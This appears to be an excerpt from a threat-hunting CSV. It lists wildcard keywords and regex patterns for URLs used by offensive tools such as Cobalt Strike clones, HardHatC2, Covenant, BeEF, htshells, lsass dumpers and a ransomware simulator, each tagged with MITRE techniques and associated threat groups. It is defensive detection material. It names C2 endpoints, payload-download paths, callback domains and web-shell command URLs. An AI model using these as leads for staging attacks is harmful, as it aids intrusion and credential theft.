"*http*/zha0gongz1*",".{0,1000}http.{0,1000}\/zha0gongz1.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","47342"
"*http*://*/Terminator.sys",".{0,1000}http.{0,1000}\:\/\/.{0,1000}\/Terminator\.sys","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","47343"
"*http*://127.0.0.1:4433*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:4433.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","47344"
"*http*://127.0.0.1:5556*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:5556.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","47345"
"*http*://localhost:4433*",".{0,1000}http.{0,1000}\:\/\/localhost\:4433.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","47346"
"*http*://localhost:5556*",".{0,1000}http.{0,1000}\:\/\/localhost\:5556.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","47347"
"*http*:3000/hook.js*",".{0,1000}http.{0,1000}\:3000\/hook\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47348"
"*http*:3200/manjusaka*",".{0,1000}http.{0,1000}\:3200\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","47349"
"*http*:801/bq1iFEP2*",".{0,1000}http.{0,1000}\:801\/bq1iFEP2.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","47350"
"*http*127.0.0.1:21802*",".{0,1000}http.{0,1000}127\.0\.0\.1\:21802.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47351"
"*http*127.0.0.1:3030*",".{0,1000}http.{0,1000}127\.0\.0\.1\:3030.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","47352"
"*http*127.0.0.1:5000*",".{0,1000}http.{0,1000}127\.0\.0\.1\:5000.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47353"
"*http*127.0.0.1:50050*",".{0,1000}http.{0,1000}127\.0\.0\.1\:50050.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","47354"
"*http*127.0.0.1:5096*",".{0,1000}http.{0,1000}127\.0\.0\.1\:5096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47355"
"*http*127.0.0.1:57230*",".{0,1000}http.{0,1000}127\.0\.0\.1\:57230.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","47356"
"*http*127.0.0.1:7096*",".{0,1000}http.{0,1000}127\.0\.0\.1\:7096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47357"
"*http*127.0.0.1:8080/*.dll*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47358"
"*http*127.0.0.1:8080/*.exe*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47359"
"*http*127.0.0.1:8080/*.ps1*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47360"
"*http*127.0.0.1:9631*",".{0,1000}http.{0,1000}127\.0\.0\.1\:9631.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47361"
"*http*localhost:21802*",".{0,1000}http.{0,1000}localhost\:21802.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47363"
"*http*localhost:3030*",".{0,1000}http.{0,1000}localhost\:3030.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","47364"
"*http*localhost:5000*",".{0,1000}http.{0,1000}localhost\:5000.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47365"
"*http*localhost:50050*",".{0,1000}http.{0,1000}localhost\:50050.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","47366"
"*http*localhost:5096*",".{0,1000}http.{0,1000}localhost\:5096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47367"
"*http*localhost:57230*",".{0,1000}http.{0,1000}localhost\:57230.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","47368"
"*http*localhost:7096*",".{0,1000}http.{0,1000}localhost\:7096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47369"
"*http*localhost:9631*",".{0,1000}http.{0,1000}localhost\:9631.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47370"
"*http.title:*BIG-IP&reg*- Redirect*",".{0,1000}http\.title\:.{0,1000}BIG\-IP\&reg.{0,1000}\-\sRedirect.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","N/A","1","55","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z","47371"
"*HTTP/EXEGOL-01.*",".{0,1000}HTTP\/EXEGOL\-01\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47372"
"*http://*.oast.fun/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.fun\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for  payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47376"
"*http://*.oast.live/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.live\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for  payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47377"
"*http://*.oast.me/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.me\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for  payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47378"
"*http://*.oast.online/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.online\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for  payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47379"
"*http://*.oast.pro/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.pro\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for  payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47380"
"*http://*.oast.site/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.site\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for  payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47381"
"*http://*.oastify.com/*",".{0,1000}http\:\/\/.{0,1000}\.oastify\.com\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for  payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47382"
"*http://*.onion*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47383"
"*http://*.tor2web*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47388"
"*http://*.torlink*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47389"
"*http://*/.htaccess?c=cmd*",".{0,1000}http\:\/\/.{0,1000}\/\.htaccess\?c\=cmd.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47393"
"*http://*/.htaccess?c=uname -a*",".{0,1000}http\:\/\/.{0,1000}\/\.htaccess\?c\=uname\s\-a.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47394"
"*http://*/FortyNorth/GetIt*",".{0,1000}http\:\/\/.{0,1000}\/FortyNorth\/GetIt.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","47395"
"*http://*/FortyNorth/PostIt*",".{0,1000}http\:\/\/.{0,1000}\/FortyNorth\/PostIt.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","47396"
"*http://*:*/down/*/host.ps1*",".{0,1000}http\:\/\/.{0,1000}\:.{0,1000}\/down\/.{0,1000}\/host\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","47397"
"*http://*Microsoft.ActiveDirectory.Management.dll*",".{0,1000}http\:\/\/.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","47399"
"*http://0hRIb4t1fWNPYBVA.net/index.php*",".{0,1000}http\:\/\/0hRIb4t1fWNPYBVA\.net\/index\.php.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","47400"
"*http://0x0.st/tm*",".{0,1000}http\:\/\/0x0\.st\/tm.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","47401"
"*http://10.10.13.37*",".{0,1000}http\:\/\/10\.10\.13\.37.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","47402"
"*http://101.251.217.210*",".{0,1000}http\:\/\/101\.251\.217\.210.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","47403"
"*http://127.0.0.1*/nlaksnfaobcaowb*",".{0,1000}http\:\/\/127\.0\.0\.1.{0,1000}\/nlaksnfaobcaowb.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","47404"
"*http://127.0.0.1/CrossC2*",".{0,1000}http\:\/\/127\.0\.0\.1\/CrossC2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","47405"
"*http://127.0.0.1/FUZZ*",".{0,1000}http\:\/\/127\.0\.0\.1\/FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","47406"
"*http://127.0.0.1/handshake.php*",".{0,1000}http\:\/\/127\.0\.0\.1\/handshake\.php.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47407"
"*http://127.0.0.1/ntdll.dll*",".{0,1000}http\:\/\/127\.0\.0\.1\/ntdll\.dll.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","1","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","47408"
